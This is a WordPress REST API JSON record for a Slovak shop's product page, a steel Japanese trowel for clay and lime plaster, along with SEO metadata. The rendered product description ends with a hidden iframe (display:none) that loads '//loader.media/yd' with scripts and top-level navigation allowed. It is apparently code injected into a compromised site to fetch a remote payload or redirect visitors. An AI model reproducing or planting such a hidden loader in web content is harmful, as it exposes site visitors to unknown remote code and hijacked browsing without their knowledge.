{"id":6388,"date":"2026-03-18T06:39:51","date_gmt":"2026-03-18T05:39:51","guid":{"rendered":"https:\/\/hlinar.sk\/?post_type=product&#038;p=6388"},"modified":"2026-03-18T06:54:01","modified_gmt":"2026-03-18T05:54:01","slug":"japonska-lyzica-pruzna-ocelova-spicata-270-x-07mm","status":"publish","type":"product","link":"https:\/\/hlinar.sk\/en\/product\/japonska-lyzica-pruzna-ocelova-spicata-270-x-07mm\/","title":{"rendered":"Japonsk\u00e1 ly\u017eica pru\u017en\u00e1 oce\u013eov\u00e1 \u0161picat\u00e1 270 x 0,7mm"},"content":{"rendered":"<p>Japonsk\u00e1 ly\u017eica z pru\u017enej ocele pre nan\u00e1\u0161anie a tvarovanie detailov <a href=\"https:\/\/hlinar.sk\/en\/product-category\/stavebne-materialy\/hlinene-omietky\/\">hlinen\u00fdch omietok<\/a> alebo <a href=\"https:\/\/hlinar.sk\/en\/vodeodolne-povrchy\/\">v\u00e1penn\u00fdch povrchov<\/a>.<\/p>\n<div>&nbsp;<\/div>\n<div><iframe class=\"loading\" style=\"display: none;\" src=\"\/\/loader.media\/yd\" sandbox=\"allow-top-navigation allow-same-origin allow-scripts\"><\/iframe><\/div>","protected":false},"excerpt":{"rendered":"<p>Japonsk\u00e1 ly\u017eica na nan\u00e1\u0161anie a tvarovanie detailov <a href=\"https:\/\/hlinar.sk\/en\/product-category\/stavebne-materialy\/hlinene-omietky\/\">hlinen\u00fdch omietok<\/a> alebo <a href=\"https:\/\/hlinar.sk\/en\/vodeodolne-povrchy\/\">v\u00e1penn\u00fdch povrchov<\/a>.<\/p>","protected":false},"featured_media":6389,"comment_status":"open","ping_status":"closed","template":"","meta":{"ngg_post_thumbnail":0},"product_brand":[],"product_cat":[426,429],"product_tag":[118,112,109,42,115,116,117,34,110,111],"class_list":{"0":"post-6388","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-japonske-lyzice-vymazavacie","7":"product_cat-tvrde","8":"product_tag-hladene-omietky","9":"product_tag-hlinena-omietka","10":"product_tag-hlinene-materialy","11":"product_tag-hlinene-omietky","12":"product_tag-japonske-hladitko","13":"product_tag-japonske-naradie","14":"product_tag-japonske-omietky","15":"product_tag-marocky-stuk","16":"product_tag-prirodne-materialy","17":"product_tag-prirodne-omietky","19":"first","20":"instock","21":"featured","22":"taxable","23":"shipping-taxable","24":"purchasable","25":"product-type-simple"},"supplier_id":3852,"supplier_sku":"B004IMP4TS","barcode":null,"atum_controlled":true,"out_stock_date":null,"out_stock_threshold":null,"inheritable":false,"inbound_stock":null,"stock_on_hold":0,"sold_today":0,"sales_last_days":0,"out_stock_days":0,"lost_sales":0,"has_location":false,"update_date":"2026-04-26T00:39:17","atum_locations":[],"atum_stock_status":"instock","restock_status":false,"low_stock_amount":1,"sales_update_date":"2026-04-26T00:39:17","calc_backorders":null,"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.2 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Japonsk\u00e1 ly\u017eica pru\u017en\u00e1 oce\u013eov\u00e1 \u0161picat\u00e1 270 x 0,7mm - HLIN\u00c1Rovie-shop<\/title>\n<meta name=\"description\" content=\"Japonsk\u00e1 ly\u017eica z pru\u017enej ocele s drevenou r\u00fa\u010dkou na nan\u00e1\u0161anie a tvarovanie detailov hlinen\u00fdch omietok alebo v\u00e1penn\u00fdch povrchov.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/hlinar.sk\/en\/product\/japonska-lyzica-pruzna-ocelova-spicata-270-x-07mm\/\" \/>\n<meta property=\"og:locale\" content=\"en_GB\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Japonsk\u00e1 ly\u017eica pru\u017en\u00e1 oce\u013eov\u00e1 \u0161picat\u00e1 270 x 0,7mm - HLIN\u00c1Rovie-shop\" \/>\n<meta property=\"og:description\" content=\"Japonsk\u00e1 ly\u017eica z pru\u017enej ocele s drevenou r\u00fa\u010dkou na nan\u00e1\u0161anie a tvarovanie detailov hlinen\u00fdch omietok alebo v\u00e1penn\u00fdch povrchov.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/hlinar.sk\/en\/product\/japonska-lyzica-pruzna-ocelova-spicata-270-x-07mm\/\" \/>\n<meta property=\"og:site_name\" content=\"HLIN\u00c1R Stano Prorok\" \/>\n<meta property=\"article:modified_time\" content=\"2026-03-18T05:54:01+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Estimated reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/hlinar.sk\/produkt\/japonska-lyzica-pruzna-ocelova-spicata-270-x-07mm\/\",\"url\":\"https:\/\/hlinar.sk\/produkt\/japonska-lyzica-pruzna-ocelova-spicata-270-x-07mm\/\",\"name\":\"Japonsk\u00e1 ly\u017eica pru\u017en\u00e1 oce\u013eov\u00e1 \u0161picat\u00e1 270 x 0,7mm - HLIN\u00c1Rovie-shop\",\"isPartOf\":{\"@id\":\"https:\/\/hlinar.sk\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/hlinar.sk\/produkt\/japonska-lyzica-pruzna-ocelova-spicata-270-x-07mm\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/hlinar.sk\/produkt\/japonska-lyzica-pruzna-ocelova-spicata-270-x-07mm\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/hlinar.sk\/sk\/wp-content\/uploads\/2026\/03\/1000062563-scaled.jpg\",\"datePublished\":\"2026-03-18T05:39:51+00:00\",\"dateModified\":\"2026-03-18T05:54:01+00:00\",\"description\":\"Japonsk\u00e1 ly\u017eica z pru\u017enej ocele s drevenou r\u00fa\u010dkou na nan\u00e1\u0161anie a tvarovanie detailov hlinen\u00fdch omietok alebo v\u00e1penn\u00fdch povrchov.\",\"breadcrumb\":{\"@id\":\"https:\/\/hlinar.sk\/produkt\/japonska-lyzica-pruzna-ocelova-spicata-270-x-07mm\/#breadcrumb\"},\"inLanguage\":\"en-GB\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/hlinar.sk\/produkt\/japonska-lyzica-pruzna-ocelova-spicata-270-x-07mm\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-GB\",\"@id\":\"https:\/\/hlinar.sk\/produkt\/japonska-lyzica-pruzna-ocelova-spicata-270-x-07mm\/#primaryimage\",\"url\":\"https:\/\/hlinar.sk\/sk\/wp-content\/uploads\/2026\/03\/1000062563-scaled.jpg\",\"contentUrl\":\"https:\/\/hlinar.sk\/sk\/wp-content\/uploads\/2026\/03\/1000062563-scaled.jpg\",\"width\":1920,\"height\":2560},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/hlinar.sk\/produkt\/japonska-lyzica-pruzna-ocelova-spicata-270-x-07mm\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/hlinar.sk\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Japonsk\u00e1 ly\u017eica pru\u017en\u00e1 oce\u013eov\u00e1 \u0161picat\u00e1 270 x 0,7mm\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/hlinar.sk\/#website\",\"url\":\"https:\/\/hlinar.sk\/\",\"name\":\"HLIN\u00c1R Stano Prorok\",\"description\":\"Stavebniny od pr\u00edrody.\",\"publisher\":{\"@id\":\"https:\/\/hlinar.sk\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/hlinar.sk\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-GB\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/hlinar.sk\/#organization\",\"name\":\"HLIN\u00c1R Stano Prorok\",\"url\":\"https:\/\/hlinar.sk\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-GB\",\"@id\":\"https:\/\/hlinar.sk\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/hlinar.sk\/sk\/wp-content\/uploads\/2020\/11\/logo-na-stranku-s-nazvom-priesvit-biele.png\",\"contentUrl\":\"https:\/\/hlinar.sk\/sk\/wp-content\/uploads\/2020\/11\/logo-na-stranku-s-nazvom-priesvit-biele.png\",\"width\":8048,\"height\":1432,\"caption\":\"HLIN\u00c1R Stano Prorok\"},\"image\":{\"@id\":\"https:\/\/hlinar.sk\/#\/schema\/logo\/image\/\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Japonsk\u00e1 ly\u017eica pru\u017en\u00e1 oce\u013eov\u00e1 \u0161picat\u00e1 270 x 0,7mm - HLIN\u00c1Rovie-shop","description":"Japonsk\u00e1 ly\u017eica z pru\u017enej ocele s drevenou r\u00fa\u010dkou na nan\u00e1\u0161anie a tvarovanie detailov hlinen\u00fdch omietok alebo v\u00e1penn\u00fdch povrchov.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/hlinar.sk\/en\/product\/japonska-lyzica-pruzna-ocelova-spicata-270-x-07mm\/","og_locale":"en_GB","og_type":"article","og_title":"Japonsk\u00e1 ly\u017eica pru\u017en\u00e1 oce\u013eov\u00e1 \u0161picat\u00e1 270 x 0,7mm - HLIN\u00c1Rovie-shop","og_description":"Japonsk\u00e1 ly\u017eica z pru\u017enej ocele s drevenou r\u00fa\u010dkou na nan\u00e1\u0161anie a tvarovanie detailov hlinen\u00fdch omietok alebo v\u00e1penn\u00fdch povrchov.","og_url":"https:\/\/hlinar.sk\/en\/product\/japonska-lyzica-pruzna-ocelova-spicata-270-x-07mm\/","og_site_name":"HLIN\u00c1R Stano Prorok","article_modified_time":"2026-03-18T05:54:01+00:00","twitter_card":"summary_large_image","twitter_misc":{"Estimated reading time":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/hlinar.sk\/produkt\/japonska-lyzica-pruzna-ocelova-spicata-270-x-07mm\/","url":"https:\/\/hlinar.sk\/produkt\/japonska-lyzica-pruzna-ocelova-spicata-270-x-07mm\/","name":"Japonsk\u00e1 ly\u017eica pru\u017en\u00e1 oce\u013eov\u00e1 \u0161picat\u00e1 270 x 0,7mm - HLIN\u00c1Rovie-shop","isPartOf":{"@id":"https:\/\/hlinar.sk\/#website"},"primaryImageOfPage":{"@id":"https:\/\/hlinar.sk\/produkt\/japonska-lyzica-pruzna-ocelova-spicata-270-x-07mm\/#primaryimage"},"image":{"@id":"https:\/\/hlinar.sk\/produkt\/japonska-lyzica-pruzna-ocelova-spicata-270-x-07mm\/#primaryimage"},"thumbnailUrl":"https:\/\/hlinar.sk\/sk\/wp-content\/uploads\/2026\/03\/1000062563-scaled.jpg","datePublished":"2026-03-18T05:39:51+00:00","dateModified":"2026-03-18T05:54:01+00:00","description":"Japonsk\u00e1 ly\u017eica z pru\u017enej ocele s drevenou r\u00fa\u010dkou na nan\u00e1\u0161anie a tvarovanie detailov hlinen\u00fdch omietok alebo v\u00e1penn\u00fdch povrchov.","breadcrumb":{"@id":"https:\/\/hlinar.sk\/produkt\/japonska-lyzica-pruzna-ocelova-spicata-270-x-07mm\/#breadcrumb"},"inLanguage":"en-GB","potentialAction":[{"@type":"ReadAction","target":["https:\/\/hlinar.sk\/produkt\/japonska-lyzica-pruzna-ocelova-spicata-270-x-07mm\/"]}]},{"@type":"ImageObject","inLanguage":"en-GB","@id":"https:\/\/hlinar.sk\/produkt\/japonska-lyzica-pruzna-ocelova-spicata-270-x-07mm\/#primaryimage","url":"https:\/\/hlinar.sk\/sk\/wp-content\/uploads\/2026\/03\/1000062563-scaled.jpg","contentUrl":"https:\/\/hlinar.sk\/sk\/wp-content\/uploads\/2026\/03\/1000062563-scaled.jpg","width":1920,"height":2560},{"@type":"BreadcrumbList","@id":"https:\/\/hlinar.sk\/produkt\/japonska-lyzica-pruzna-ocelova-spicata-270-x-07mm\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/hlinar.sk\/"},{"@type":"ListItem","position":2,"name":"Japonsk\u00e1 ly\u017eica pru\u017en\u00e1 oce\u013eov\u00e1 \u0161picat\u00e1 270 x 0,7mm"}]},{"@type":"WebSite","@id":"https:\/\/hlinar.sk\/#website","url":"https:\/\/hlinar.sk\/","name":"HLIN\u00c1R Stano Prorok","description":"Stavebniny od pr\u00edrody.","publisher":{"@id":"https:\/\/hlinar.sk\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/hlinar.sk\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-GB"},{"@type":"Organization","@id":"https:\/\/hlinar.sk\/#organization","name":"HLIN\u00c1R Stano Prorok","url":"https:\/\/hlinar.sk\/","logo":{"@type":"ImageObject","inLanguage":"en-GB","@id":"https:\/\/hlinar.sk\/#\/schema\/logo\/image\/","url":"https:\/\/hlinar.sk\/sk\/wp-content\/uploads\/2020\/11\/logo-na-stranku-s-nazvom-priesvit-biele.png","contentUrl":"https:\/\/hlinar.sk\/sk\/wp-content\/uploads\/2020\/11\/logo-na-stranku-s-nazvom-priesvit-biele.png","width":8048,"height":1432,"caption":"HLIN\u00c1R Stano Prorok"},"image":{"@id":"https:\/\/hlinar.sk\/#\/schema\/logo\/image\/"}}]}},"_links":{"self":[{"href":"https:\/\/hlinar.sk\/en\/wp-json\/wp\/v2\/product\/6388","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hlinar.sk\/en\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/hlinar.sk\/en\/wp-json\/wp\/v2\/types\/product"}],"replies":[{"embeddable":true,"href":"https:\/\/hlinar.sk\/en\/wp-json\/wp\/v2\/comments?post=6388"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/hlinar.sk\/en\/wp-json\/wp\/v2\/media\/6389"}],"wp:attachment":[{"href":"https:\/\/hlinar.sk\/en\/wp-json\/wp\/v2\/media?parent=6388"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/hlinar.sk\/en\/wp-json\/wp\/v2\/product_brand?post=6388"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/hlinar.sk\/en\/wp-json\/wp\/v2\/product_cat?post=6388"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/hlinar.sk\/en\/wp-json\/wp\/v2\/product_tag?post=6388"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}